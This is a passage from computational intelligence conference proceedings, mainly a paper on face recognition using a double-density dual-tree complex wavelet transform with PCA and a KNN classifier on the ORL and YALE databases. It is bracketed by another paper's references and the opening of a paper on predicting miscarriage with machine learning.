combination with our proposed methodology and exploring other machine learning
algorithms for performing classification.
406 T. Jain and J. Yadav

References

1. Li, S. Z., & Jain, A. K. (2005). Handbook of face recognition. Springer.


2. Okokpujie, K., Noma-Osaghae, E., John, S., Grace, K., & Okokpujie, I. (2017). A face recog-
nition attendance system with GSM notification. In IEEE 3rd International Conference on
Electro-Technology for National Development (NIGERCON), Owerri (pp. 239–244). https://
doi.org/10.1109/NIGERCON.2017.8281895.
3. Soltanpour, S., Boufama, B., Jonathan Wu, Q. M. (2017). A survey of local feature methods
for 3D face recognition. Pattern Recognition, 72, 391–406. ISSN 0031-3203, https://doi.org/
10.1016/j.patcog.2017.08.003.
4. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld. (2003). Face recognition: A literature
survey. ACM Computing Surveys, 35(4), 399–458. https://doi.org/10.1145/954339.954342.
5. Turk, M., & Pentland, A. (1991). Eigenfaces for recognition. Journal of Cognitive Neuro-
science, 3(1), 71–86. https://doi.org/10.1162/jocn.1991.3.1.71
6. Belhumeur, P. N., Hespanha, J. P., & Kriegman, D. J. (1997). Eigenfaces vs. fisherfaces:
Recognition using class specific linear projection. IEEE Transactions on Pattern Analysis and
Machine Intelligence, 19(7), 711–720. https://doi.org/10.1109/34.598228.
7. Zhang, Z., Lyons, M., Schuster, M., & Akamatsu, S. (1998). Comparison between geometry-
based and Gabor-wavelets-based facial expression recognition using multi-layer perceptron. In
Proceedings Third IEEE International Conference on Automatic Face and Gesture Recognition,
Nara (pp. 454–459). https://doi.org/10.1109/AFGR.1998.670990.
8. Mahmood, M., Jalal, A., Evans, H. A. (2018). Facial expression recognition in image sequences
using 1D transform and gabor wavelet transform. In 2018 International Conference on Applied
and Engineering Mathematics (ICAEM), Taxila (pp. 1–6).
9. Kathuria, D., & Yadav, J. (2018). An improved illumination invariant face recognition based on
Gabor wavelet transform. In 2018 Conference on Information and Communication Technology
(CICT), Jabalpur, India (pp. 1–6). https://doi.org/10.1109/INFOCOMTECH.2018.8722408.
10. Yadav, J., Rajpal, N., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA
and cosine angle distance measure. In 2016 Ninth International Conference on Contemporary
Computing (IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
11. Yin, X., & Liu, X. (2018). Multi-task convolutional neural network for pose-invariant face
recognition. IEEE Transactions on Image Processing, 27(2), 964–975. https://doi.org/10.1109/
TIP.2017.2765830
12. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
13. Balasundaram, A., & Ashokkumar, S. (2020). Study of facial expression recognition using
machine learning techniques. Journal of Critical Reviews, 7(8), 2429–2437.
14. Yadav, J., Rajpal, N., & Mehta, R. (2019). An improved illumination normalization and robust
feature extraction technique for face recognition under varying illuminations. Arabian Journal
for Science and Engineering, 44(11), 9067–9086.
15. Martis, R. J., Acharyaa, U. R., & Min, L. C. (2013). ECG beat classification using PCA, LDA,
ICA and discrete wavelet transform. Biomedical Signal Processing and Control, 8, 437–448.
https://doi.org/10.1016/j.bspc.2013.01.005
16. Bajrami, X., Gashi, B., & Murturi, I. (2018). Face recognition performance using linear discrim-
inant analysis and deep neural networks. International Journal of Applied Pattern Recognition,
5(3), 240–250.
17. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 5(2), 149–170. https://doi.org/10.1504/IJAPR.2018.092523
18. Soman, K. P., Loganathan, R., & Ajay, V. (2009). Machine learning with SVM and other Kernel
methods. PHI Learning.
An Enhanced Support Vector Machine for Face Recognition … 407

19. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT) (pp. 1–7). https://doi.org/10.1109/I2CT42659.2018.9058243.
20. Ouyanga, A., Liub, Y., Pei, S., Penga, X., He, M., & Wang, Q. (2020) A hybrid improved
kernel LDA and PNN algorithm for efficient face recognition. Neurocomputing, 393, 214–222.
https://doi.org/10.1016/j.neucom.2019.01.117.
21. Zhang, T., Tang, Y. Y., Fang, B., Shang, Z., & Liu, X. (2009). Face recognition under varying
illumination using gradientfaces. IEEE Transactions on Image Processing, 18(11), 2599–2606.
https://doi.org/10.1109/TIP.2009.2028255
22. Nayef Al-Dabagh, M. Z., Mohammed Alhabib, M. H., & AL-Mukhtar, F. H. (2018). Face
recognition system based on kernel discriminant analysis, k-nearest neighbor and support
vector machine. International Journal of Research and Engineering, 5(3), 335–338.
23. Rakshit, P., Basu, R., Paul, S., Bhattacharyya, S., Mistri, J., & Nath, I. (2019). Face detection
using support vector machine with PCA. In 2nd International Conference on Non-Conventional
Energy: Nanotechnology and Nanomaterials for Energy and Environment (ICNNEE).
24. Gumus, E., Kilic, N., Sertbas, A., & Ucan, O. N. (2010). Evaluation of face recognition using
PCA, wavelets and SVM. Expert Systems with Applications, 37, 6404–6408. https://doi.org/
10.1016/j.eswa.2010.02.079.
25. Abikoye, O. C., Shoyemi, I. F., & Aro, T. O. (2019). Comparative analysis of illumination
normalizations on principal component analysis based feature extraction for face recognition.
FUOYE Journal of Engineering and Technology, 4(1), 67–69.
Large Scale Double Density Dual Tree
Complex Wavelet Transform Based
Robust Feature Extraction for Face
Recognition

Juhi Chaudhary and Jyotsna Yadav

Abstract Varying effects in face recognition often causes intrapersonal variations


due to which efficient feature extraction is desirable. In this work, a significant feature
extraction technique based on Double Density Dual Tree Complex Wavelet Trans-
form (DD_DTCWT) is proposed for face recognition. DD_DTCWT is a variant
of wavelet transformation which provides better multiresolution sub-band spectral
analysis of face images with good shift invariance and directional selectivity. Exten-
sive experiments are performed with slight pose variations on ORL database and
on images with illumination and expression variations in YALE database. It has
been depicted from experimental results that the proposed technique for large-scale
Double Density Dual Tree Complex Wavelet Transform-based robust feature extrac-
tion yields accurate results on Yale database and better results on ORL database as
compared with state-of-the-art techniques. The classification is performed on training
and testing face vectors based on DD_DTCWT using K-nearest neighbor classi-
fier. Several experiments are performed to analyze significant features by varying
decomposition levels for sub-band selection and number of images in training set.

Keywords Double density dual-tree complex wavelet transform (DD_DTCWT) ·


K-nearest neighbor · Filter bank · Directional selectivity · Shift invariance

1 Introduction

Face recognition (FR) is an approach for identification and authentication of human


face from captured digital images or videos [1]. Among various biometric systems,
facial recognition systems gained a vital importance because of its practical applica-
tions such as access control, authentication, surveillance and biometric systems. Face
recognition process is broadly classified in following stages such as preprocessing,

J. Chaudhary · J. Yadav (B)


University School of Information and Communication Technology, Guru Gobind Singh
Indraprastha University, Dwarka, New Delhi, India
e-mail: jyotsnayadav@ipu.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 409
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_33
410 J. Chaudhary and J. Yadav

feature extraction (dimensionality reduction) and feature classification or matching


[2].
There are some critical challenges due to which the appearance of an individual
changes such as face expression, illumination or light variations, aging, low resolu-
tion, variations in pose and surgery. Correspondingly, researchers have not attained
desirable level of accuracies in field of face recognition because of above-mentioned
challenges. To overcome these issues, many FR techniques have been introduced
and still research is an ongoing practice. A good FR system must be resistant to
above-stated varying circumstances that manipulates the image and encumbers the
recognition process. In the study [3], authors have performed illumination normaliza-
tion by utilizing homomorphic filtering based on discrete wavelet transform (DWT)
in 2018. This work was extended in [4] where the authors have also introduced
a novel technique for light variation conditions based on reflectance ratio (RR)
and integer wavelet transform (IWT) in fisher sub-space. Selvakumar et al. in 2015
proposed sparse representation technique for normalizing illumination variations in
logarithmic domain by utilizing DTCWT and eigen sub-space [5]. Wang et al. [6]
presented an adaptive singular value decomposition based on 2D-DWT (ASVDW)
method illumination compensation over colored images in 2018. In recent work, Sahil
et al. [7] proposed a novel adaptive technique illumination normalization approach for
FR. The authors here have utilized fractional discrete Cosine transform (Fr-DCT)
with non-iterative classifier (KELM) and obtained accurate results on CMU-PIE
face database in 2020. In work of [8], Zied et al.has utilized PCA, ICA, LDA, FR
approaches based on discrete wavelet transform (DWT) by employing SVM classifier
for recognition. This work performed experiments on AT&T over LL (approxima-
tion/low pass) sub-image being selected iteratively. Dalali et al. in 2016 [9] utilized
a FR system based on Daubechies wavelet and modified local binary pattern (LBP)
technique on single level of decomposition over MIT face database. Huang et al. in
work [10] proposed a central symmetric local direction pattern (CSLDP) technique
with Gabor wavelet transform which provides full illumination in 2017. Here in this
study, authors performed experiments on AR and YALE database with spare repre-
sentation classifier (SRC). In another work [11], Rajpal et al. proposed an expression
invariant FR technique in eigen sub-space. This work utilized proximal support vector
machine (PSVM) nonlinear classifier on JAFEE database with 98.33% recognition
rate (RR).
Hence, it is observed from the above cited recent studies that researchers have
majorly utilized preprocessing techniques for robust feature extraction and better
RR. The major contribution of the proposed FR system is as follows:
• An enhanced technique employs double density dual-tree complex wavelet trans-
form DD_DTCWT and principal component analysis (PCA) for large-scale robust
feature extraction.
• The proposed work is performed without any preprocessing techniques for
normalization on YALE and ORL face database, respectively. The classification
is performed with K-nearest neighbor (KNN) linear classifier.
Large Scale Double Density Dual Tree Complex Wavelet … 411

• Furthermore, the proposed work accomplishes the comparison of attained results


with state-of-the-art approaches.
Also, to assess the performance and efficiency of proposed work, the experi-
ments are performed on system with 8GB RAM, 2.40 CPU speed, 64-bit Intel Core
processor. The system is installed with MATLAB 2019 for processing.
The subsequent sections of the paper are prepared in the following manner.
Section 2 details the proposed methodology and preliminary information related
toward the methods utilized in the work. Experimental results are represented in
Section 3. Section 4 illustrates the discussion on comparative analysis of obtained
outcomes. Finally, the conclusion and future possibilities of proposed system are
covered in Section 5 of the paper.

2 Preliminaries and Proposed Methodology

2.1 Wavelet Transformation Techniques

This section of the paper depicts preliminary description of the major multi-resolution
spectral analysis of images using wavelet transformation techniques. The discrete
wavelet transform (DWT) analyzed in study [12] depicts that it is possible to decom-
pose a digital image into a “approximation coefficient” which are the low-frequency
component content and “detailed coefficient” which is basically the high-frequency
components in an image. A 2D-DWT technique decomposes image into three detailed
sub-bands which are (LH, HL and HH) corresponding to vertical, horizontal and diag-
onal directional details, respectively. The LL (approximation) sub-image provides
the low-frequency details of an image. Some major shortcomings of DWT trans-
form are shift or translation invariance and lack of directional selectivity with few
orientations, which are 0o , ±90o , ±45oz .
Dual tree complex wavelet transform (DTCWT) is introduced in the study [13]
to overcome the weakness of DWT which provides less discrimination power for
face image features. This technique solves the issue of shift or translation variance in
images as any small change in input function does not cause interference in wavelet
coefficients. DTCWT also provides good angular resolution that gives better direction
selectivity in terms of orientation angles. In DTCWT, filter bank used in first level of
decomposition must differ from the filters used at subsequent stages. DTCWT gener-
ates wavelet coefficients of three orientations namely LH, HL and HH, respectively.
The six directional sub-bands each at real and imaginary tree so formed are LH + ,
HH + , HL + , LH − , HH − and HL − describing the edges(high-frequency components)
are oriented at −75◦ , − 45◦ , − 15◦ , + 15◦ , + 45◦ , + 75◦ , respectively.
Double density discrete wavelet transform (DD_DWT) is a variant of DWT
proposed in study of Selesnick in 2004 [14]. This technique has a 3-channel filter
bank structure which has one scaling (low pass) and two wavelets (high pass) func-
tions. Unlike DTCWT, in this method, same filters are used in all subsequent stages
412 J. Chaudhary and J. Yadav

of decomposition. In 2D-DD_DWT transformation, there is one low-pass filter and


two high-pass filter bank which are applied alternatively over rows and columns
of image. It provides different wavelets coefficients with eight orientations. The
output from each filter is down sampled by factor of two at each level. DD_DWT is
nearly shift invariant and provides more detailed sub-bands or directional wavelets.
However, some of the diverse wavelets still lacks in spatial orientation and directional
selectivity.
Double Density Dual Tree Complex Wavelet Transform
Double density dual-tree complex wavelet transform (DD_DTCWT) technique is a
conglomerate of DTCWT and DD_DWT. Therefore, this method includes the advan-
tages of both. DD_DTCWT overcomes the limitations of DD_DWT by providing
more directional wavelets with shift invariance [15]. This technique has two trees
which provides real and imaginary information of wavelets, respectively. Each tree
structure is a 3-channel filter bank which has one scaling and two wavelet functions.
The image is passed through one low-pass filter and two high-pass filters in both
TreeA and TreeB as illustrated in Fig. 1.
Unlike DTCWT, this wavelet transform generates wavelet coefficients of eight
orientations and each orientation gives a specific direction. The orientations are

Fig. 1 Structural implementation of double density dual-tree complex wavelet transform


Large Scale Double Density Dual Tree Complex Wavelet … 413

[H1_H2, H1H3, H2_H1, H2_H2, H2_H3, H3_H1, H3_H2, H3_H3] where H1 repre-
sents low-pass filter and [H2, H3] are the two high-pass filters. Different analysis
filters are used in first stage and next higher levels of decomposition. In this way,
DD_DTCWT provides good directional selectivity by small-scale feature selection
also. Each tree contains one low-pass (approximation) sub-band and eight detailed
(high pass) sub-bands, respectively. The design implementation of DD_DTCWT at
first level of decomposition is demonstrated in Fig. 1.

2.2 Principal Component Analysis (PCA)

PCA is a feature extraction technique which is utilized for reduction of dimensionality


by representing human faces in lower dimensions as proposed by Kirby in 1990 and
this was recognized as Eigenface approach in 1991 by Turk & Pentland [16]. In
the proposed work, PCA is implemented for extracting robust feature vectors after
transforming an image using DD_DTCWT technique. The major steps involved in
PCA are discussed as follows.
i. Consider a face images database for training and testing purpose that could be
utilized in face recognition. Each N × N image in dataset is converted into
N 2 × 1 (column vector) face vectors which together makes a face vector space.
ii. Then these face vectors are normalized. For normalization average face vector
(mean face) is calculated which needs to be subtracted from each face vector.
This normalized face vector matrix is represented by A.
iii. To calculate the eigenvectors, a covariance matrix (Q) is calculated using
equation: Q = A A T where A is a matrix of linear combination of all normal-
ized face vectors with dimension N 2 × M (M represents total face vectors in
a dataset).
iv. The size of covariance matrix will be N 2 × N 2 which is too large. To reduce
the calculations, Turk & Pentland reframed the Eq. (1) as:

Q = AT A (1)

The covariance matrix is of dimension M × M in reduced subspace.


(i) Compute eigenvalues and eigenvectors (known as Eigenfaces or principal
components).
(ii) Select ‘k’ best (eigenvectors with highest eigenvalues) principal components
which best describes the features as they have the high variance and rest are
discarded. The selected ones are eigenfaces which together makes a weighted
projection matrix (W ).
(iii) Both training and testing space are projected on PCA projection as expressed
in Eq. (2).

Training Projection = W T * training_space (2)


414 J. Chaudhary and J. Yadav

Testing Projection = W T *test_space (3)

2.3 Classification

K-nearest neighbor is a widely used supervised classification technique used to


compute the similarity between unknown image and trained images. KNN helps
in classifying the data points based on class label of considered neighbors [17]. This
classifier employs distance metric and majority voting functions for classification.
In this work, Euclidean distance measure [D(X, Y )] for YALE database is utilized
which calculates the distance between test face vector (Xi ) and training feature vector
(Yi ) as shown in Eq. (4).

 n

D(X, Y ) =  (X i − Yi )2 (4)
i=1

The work has utilized cosine angle distance [18] metric [cos(X, Y )] for ORL
database which calculates the distance as provided in Eq. (5):
n
X i Yi
cos(X, Y ) =  i=1
n (5)
n
i=1 X i .
2 2
i=1 Yi

The distances between test image and each face vector in training sample are
arranged in increasing order and the minimum distance is examined for providing
the nearest neighbor (matched image). To determine the efficiency and accuracy of
proposed system, a recognition rate is calculated by considering the percentage ratio
of matched images with total number of images in test set.

2.4 Proposed Methodology

In proposed work, the face recognition is performed in two phases namely training
and testing (recognition) of face images. In first stage, the robust feature extraction
on considered face image database is performed based on DD_DTCWT technique
with different filters in first level and next subsequent levels of decomposition.
The selection of appropriate sub-band and level of decomposition is performed in
extensive experiments. This is accomplished by varying the number of decomposition
levels and number of training images per varying subjects of face database. At each
level, an approximation sub-image is selected for further decomposition which yields
better results. Furthermore, the dimensionality reduction of transformed face images
Large Scale Double Density Dual Tree Complex Wavelet … 415

is performed by PCA by projecting the training approximation coefficients onto PCA


projection subspace (lower dimension). In the second phase, the recognition of face
images is performed by projecting the test samples on PCA projection subspace
on same scale and sub-band selection as of training set. The classification of test
samples is accomplished by using K-nearest neighbor classifier (KNN) that exploits
two distance measures namely Euclidean and Cosine angle measure on YALE and
ORL database, respectively, for achieving better recognition rate. A broad outline of
proposed methodology is represented in Fig. 2.

Fig. 2 Block diagram of proposed methodology


416 J. Chaudhary and J. Yadav

3 Experimental Results

This section provides description of datasets that are utilized in the work. In another
part of section, the selection of DD_DTCWT sub-band and level of decomposition
for comprehensive experiments is also illustrated.

3.1 Dataset

The proposed work has utilized ORL and YALE face image databases to estimate
the accuracy rate. The ORL database consist of 400 grayscale images each with
resolution 112 × 92 which are in PNG format. This database includes 40 subjects
and each subject with 10 varying images. Likewise, YALE database has 165 images
with 15 subjects. In this, each subject consists of 11 different images with resolution
243 × 320 in GIF format. The face images in YALE database has varying effects of
illumination and face expression such as sad, happy, wink, surprised, etc.
The decomposition of ORL sample face image at level 1 by utilizing DD_DTCWT
is shown in Fig. 3a. This figure depicts the Lowpass/Approximation sub-band thus
formed for both real and imaginary parts, respectively. The detailed sub-band of ORL
face image (first orientation) is represented in Fig. 3b.

Fig. 3 Decomposition of ORL face image using DD_DTCWT: a Approximation sub-image formed
on real and imaginary trees. b Detailed/High pass sub-bands formed on real and imaginary trees
Large Scale Double Density Dual Tree Complex Wavelet … 417

Table 1 Experimental results on ORL database (400 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
5(200) 93.5 3.063
6(160) 95 2.495
7(120) 96.6 1.905
8(80) 97.5 1.448

3.2 Selection of DD_DTCWT Sub-Band and Level


of Decomposition

The selection of appropriate sub-band and level of decomposition is a critical step in


implementation of proposed system to examine the efficient feature vector formula-
tion and recognition rates. The experiments are performed extensively by varying the
number of train images for every subject and decomposition levels on both approx-
imation and detailed sub-bands which are obtained by DD_DTCWT. Additionally,
in this work, the images are selected in sequential manner from each subject of both
database and the remaining set of images are utilized in testing phase.
Initially, the work examined the results at first level of decomposition by consid-
ering 50% of total images from both ORL and YALE database in training phase
on approximation (c A) and detailed (cD) sub-bands, respectively. Then obtained
results are analyzed by varying the scale between 1 and 4 on approximate sub-band
as detailed sub-band provided poor recognition rate.
The training set of ORL database comprises of 200, 240, 280 and 320 images.
Similarly, in case of YALE database, the training set includes 90,105,120 and 135
images. It has been observed that promising results on both YALE and ORL database
are obtained at level 3. Hence, all the experimental results are examined on approxi-
mation sub-band and at decomposition level 3 and sub-dimensions (principal compo-
nents) as 70. The results of ORL database in Table 1 depict that highest recognition
rate of 97.5% is obtained with proposed technique. The attained percentage accuracy
is represented using line plot in Fig. 4.
Likewise, the experiment is performed using proposed technique on YALE
database at decomposition level 3 and approximation sub-band which yields impres-
sive result of 100% accuracy rate. The attained results are shown in Table 2 and
graphical plot is expressed in Fig. 5.

4 Comparative Analysis and Discussion

The comparison of results obtained by utilizing the proposed methodology on ORL


and YALE database with other state of art methods is performed in this section.
418 J. Chaudhary and J. Yadav

Fig. 4 Recognition rate of proposed approach on ORL database at decomposition level 3

Table 2 Results on YALE database (165 total images) with decomposition level 3 and
approximation sub-band selection
Number of train images for each subject (total Recognition rate (%) Computational time (s)
number of testing images)
6(75) 86.6 6.695
7(60) 88.3 4.594
8(45) 84.4 3.738
9(30) 100 2.295

The results attained with proposed approach on ORL database are compared with
five techniques namely, DWT_PCA_SVM, DWT_FLD_SVM, DWT_DLDA_SVM,
MODULAR-2DPCA and (MF_GF_HE)_PCA_MultiSVM as illustrated in Table 3.
In the similar manner, the experimental results obtained on YALE database are
compared with five techniques such as IKLDA_PNN, GSB2DLPP, MLTP_SVM,
HE_GLPF_Gabor_PCA_SVM and RRHE-RFDWPT. The summary of results
attained in above-stated previous work is presented in Table 4.
Consequently, the comparison observed in Table 4 demonstrates that the proposed
methodology provides promising results when compared with other techniques. It
is also observed that RRHE-RFDWPT methodology [26] provides accuracy rate
Large Scale Double Density Dual Tree Complex Wavelet … 419

Fig. 5 Recognition rate of proposed approach on YALE database at decomposition level 3

Table 3 Comparison of proposed system with previous techniques on ORL database


Techniques Number of train images for each Recognition rate (%)
subject (total number of testing
images)
DWT_FLD_SVM [19] 6(160) 87
DWT_DLDA_SVM [19] 6(160) 89.60
MODULAR_2DPCA [20] 5(200) 91.5
(MF_GF_HE) _PCA_MultiSVM 5(200) 91.60
[21]
DWT_PCA_SVM [19] 6(160) 95
Proposed technique 6(160) 96.25

Table 4 Comparison of proposed system with previous techniques on YALE database


Techniques Number of train images for each Recognition rate (%)
subject (total number of testing
images)
IKLDA_PNN [22] 8(45) 83.80
GSB2DLPP [23] 8(45) 92.56
MLTP_SVM [24] 9(30) 93.33
HE_GLPF_Gabor_PCA_SVM [25] Not mentioned 95.00
RRHE-RFDWPT [26] 6(75) 98.67
Proposed technique 9(30) 100.0
420 J. Chaudhary and J. Yadav

as 98.67 with 6 training images as best obtained results, while utilizing prepro-
cessing techniques to attain illumination normalization for invariant feature extrac-
tion. But in our work, the preprocessing techniques are not employed yet attained
100% recognition rate with 9 images in training set.

5 Conclusion

A large-scale DD_DTCWT and PCA-based robust feature extraction methodology


for face recognition was proposed in the paper. An extensive experiment was
performed on ORL and YALE database in which recognition rate of 97.5% and
100% were attained, respectively. Also, an apparent comparison has been made
between proposed methodology and existing state-of-the-art techniques. In the
proposed methodology, KNN classifier is utilized for classification of unknown
samples. Although preprocessing techniques for illumination normalization are not
been utilized, yet have achieved promising results on ORL and accurate results on
YALE database.
The technique significantly outperformed on other representative methods as
shown in Sect. 3. In future, large-size face image database will be utilized for
exploring the robustness of proposed approach. Moreover, different values of ‘k’
in KNN classifier will be explored and experimented for better results. Also, other
classifiers for recognition purpose will be examined for enhancing the performance
of proposed system.

References

1. Zhao, W., Chellappa, R., Phillips, P. J., & Rosenfeld. (2003) Face recognition: a literature
survey. ACM Computing Surveys, 35(4), 399–458.
2. Stan, Z. L., & Jain, A. (2005). In Handbook of face recognition, Springer.
3. Yadav, J., Rajpal, N., & Mehta, R. (2018). A new illumination normalization framework via
homomorphic filtering and reflectance ratio in DWT domain for face recognition. Journal of
Intelligent and Fuzzy Systems, 35, 5265–5277.
4. Yadav, J., Rajpal, N., & Mehta, R. (2018). An improved hybrid illumination normalization
and feature extraction model for face recognition. International Journal of Applied Pattern
Recognition, 149–170.
5. Selvakumar, K., Jerome, J., & Rajamani, K. (2016) Robust face identification using DTCWT
and PCA subspace based sparse representation. Multimedia Tools and Applications, 16073–
16092.
6. Wang, J. W. et al. (2018). Illumination compensation for face recognition using adaptive
singular value decomposition in the wavelet domain. Information Sciences, 435, 69–93.
7. Vishwakarma, V., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools Applications, 79, 11503–11529.
8. Lahaw, Z., Essaidani, D., & Seddik, H. (2018). Robust face recognition approaches using PCA,
ICA, LDA based on DWT, and SVM algorithms. In 2018 41st International Conference on
Large Scale Double Density Dual Tree Complex Wavelet … 421

Telecommunications and Signal Processing (TSP) (pp. 1–5). Athens. https://doi.org/10.1109/


TSP.2018.8441452
9. Dalali, S., & Suresh, L. (2016). Daubechives wavelet based face recognition using modified
lbp. . Procedia Computer Science, 93, 344–350.
10. Huang, J., Zhang, Y., Zhang, H., & Cheng, K. (2019). Sparse representation face recognition
based on gabor and CSLDP feature fusion. In 2019 Chinese Control and Decision Conference
(CCDC) (pp. 5697–5701). Nanchang, China. https://doi.org/10.1109/CCDC.2019.8832457
11. Rajpal, N., Singh, A., & Yadav, J. (2018). An expression invariant face recognition based on
proximal support vector machine. In 2018 4th International Conference for Convergence in
Technology (I2CT ) (pp. 1–7). Mangalore, India. 1109/I2CT42659.2018.9058243
12. Wang, M., Jiang, H., & Li, Y. (2010). Face recognition based on DWT/DCT and SVM. In
International Conference on Computer Application and System Modeling (ICCASM 2010)
pp. 507–510. Taiyuan. https://doi.org/10.1109/ICCASM.2010.5620666
13. Yadav, J., & Sehra, K. (2018). Large scale dual tree complex wavelet transform based robust
features in PCA and SVD subspace for digital image watermarking. Procedia Computer
Science, 132, 863–872. https://doi.org/10.1016/j.procs.2018.05.098
14. Selesnick, I. (2004). The double-density dual-tree DWT. IEEE Transactions on Signal
Processing, 52(5), 1304–1314. https://doi.org/10.1109/TSP.2004.826174
15. Sharma, M., Sharma, P. et al. (2019). Double density dual-tree complex wavelet transform-
based features for automated screening of knee-joint vibro-arthrographic signals. In Machine
intelligence and signal analysis (pp. 279–290). Springer.
16. Turk, M., & Pentland, A. (1991). Eigenfaces for recognition. Journal of Cognitive Neuro-
science, 3, 71–86.
17. Kathuria, D., & Yadav, J. (2016). An improved illumination invariant face recognition based
on gabor wavelet transform. In Conference on Information and Communication Technology
(CICT ). IEEE.
18. Jyotsna, R., N., & Vishwakarma, V. (2016). Face recognition using Symlet, PCA and Cosine
angle distance measure. In Ninth International Conference on Contemporary Computing, IEEE.
19. Bagherzadeh, S., Sarcheshmeh, A. et al. (2016). A new hybrid face recognition algorithm based
on discrete wavelet transform and direct LDA. In 23rd Iranian Conference on Biomedical Engi-
neering and 2016 1st International Iranian Conference on Biomedical Engineering (ICBME)
(pp. 267–270). Tehranhttps://doi.org/10.1109/ICBME.2016.789096
20. Yan, X. (2016) Modular 2DPCA face recognition algorithm based on image segmentation.
In IEEE International Conference on Signal and Image Processing (ICSIP) (pp. 210–213).
Beijing. https://doi.org/10.1109/SIPROCESS.2016.7888254
21. Maw, H., Thu, S., & Mon, M. (2019). Face recognition based on illumination invariant tech-
niques model. In International Conference on Advanced Information Technologies (ICAIT )
(pp. 120–125). Yangon, Myanmar. https://doi.org/10.1109/AITC.2019.8921027
22. Ouyang, A., Liu, Y., Pei, S., et al. (2020). A hybrid improved kernel LDA and PNN algorithm
for efficient face recognition. Neurocomputing, 14(393), 214–222.
23. Liang, J., Hou, Z., Chen, C. et al. (2016). Supervised bilateral two-dimensional locality
preserving projection algorithm based on Gabor wavelet. SIViP, 10, 1441–1448. https://doi.
org/10.1007/s11760-016-0950-1
24. Rangsee, P., Raja, K., & Venugopal, K. (2018). modified local ternary pattern based face
recognition using SVM. In International Conference on Intelligent Informatics and Biomedical
Sciences (ICIIBMS) (pp. 343–350). Bangkok. https://doi.org/10.1109/ICIIBMS.2018.8549952
25. Li, M., Yu, X., Ryu, K., et al. (2018). Face recognition technology development with Gabor,
PCA and SVM methodology under illumination normalization condition. Cluster Computing,
21, 1117–1126. https://doi.org/10.1007/s10586-017-0806-7
26. Yadav, J., & Mehta, R. (2019). An improved illumination normalization and robust feature
extraction technique for face recognition under varying illuminations. Arabian Journal for
Science and Engineering, 44(11), 9067–9086.
A Miscarriage Prevention System Using
Machine Learning Techniques

Sarmista Biswas and Samiksha Shukla

Abstract Miscarriage or spontaneous abortion is the natural death of the fetus before
20 weeks of pregnancy. Stillbirth is the term used to refer to the fetus’s demise after
this period. Miscarriage can harm both the parents. One cannot reverse the outcome
of pregnancy. The only way to deal with miscarriage is to take certain precautions
and prevent it. With this objective, this study uses various machine learning tech-
niques such as Logistic Regression, K-Nearest Neighbors, and Random Forest to
predict a pregnancy’s outcome based on specific features. This paper focuses on
each model’s contribution and compares the algorithms’ efficiency based on some
standard evaluation measures.

Keywords Miscarriage · Logistic Regression · K-Nearest Neighbor · Random


Forest

1 Introduction

The most common reason for losing a baby during pregnancy is miscarriage. An orga-
nization called the March of Dimes, working on maternal and child health, reported
that a 10–15% rate of miscarriage is present in women aware of their pregnancy.
Nearly 2 million babies are stillborn every year. These numbers can be higher as
there is no systematic recording for miscarriages and stillbirths, even in developed
countries.
There are various causes of miscarriage, some of the common ones being the
mother’s age, chromosomal abnormalities, and uterine infections. Since spontaneous
abortion is an irreversible phenomenon, this affects the physiological and psycho-
logical well-being. Recurrent miscarriages are likely to have far-reaching negative

S. Biswas (B) · S. Shukla


Department of Data Science, Christ University, Bangalore, India
e-mail: sarmista.biswas@science.christuniversity.in
S. Shukla
e-mail: samiksha.shukla@christuniversity.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 423
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_34
424 S. Biswas and S. Shukla

impacts on both the parents. The only solution that can be beneficial is the preven-
tion of miscarriage. Henceforth, it is necessary to predict whether a pregnant woman
is likely to experience miscarriage, based on some standard criteria, as early as
possible. This work employs various machine learning classification algorithms for
this purpose. The main objective is to facilitate easy prediction of pregnancy outcome
to prevent miscarriage.
The remaining part of the paper appears in this manner. In Sect. 2, we overview
the existing literature on the prediction of miscarriage and its prevention. Section 3
explains the methodology used to achieve the study’s objective, followed by the
experimental results and discussion. Finally, we conclude and cite the references
used for the analysis.

2 Related Work

Magnus et al. [1] estimated the rate of miscarriage by associating it with the woman’s
age and pregnancy history using logistic regression, sensitivity analysis, and cluster
variance estimation. However, miscarriage can result from various underlying biolog-
ical and psychological causes, which form significant risk factors. The study did not
consider these factors.
Bruno et al. [2] designed a support decision system tool using support vector
machine to group recurrent pregnancy loss (RPL) patients into four risk classes
concerning the number of miscarriages. Unbalanced accuracy is present in the model
built using the most informative features. But when the authors used the features
recommended by the European Society of Human Reproduction and Embryology
(ESHRE), the accuracy obtained was very low. Hence, the system is less reliable.
In [3], the authors constructed and compared six machine learning classification
models, namely logistic regression, support vector machine (SVM), decision tree,
backpropagation neural network (BNN), extreme gradient boosting, and random
forest. They did this to predict the early pregnancy loss after noticing embryonic
cardiac activity, undergoing in-vitro fertilization-embryo transfer. They suggested
random forest for doctors’ better clinical decisions as they saw its performance
outperforming those of other models. However, the study did not specify the reason
for choosing BNN or any other neural network.
Pruthi et al. [4] predicted the high risks of pregnancy using decision tree, SVM,
Naïve Bayes, neural network associative classifier, and logistic regression by consid-
ering the factors responsible for pregnancy risk. They used a dataset containing all
the historic maternal information for this purpose. But it has not been noted in the
paper. No note of data mining or data processing exists through deep learning or any
advanced techniques which could have altered the accuracy.
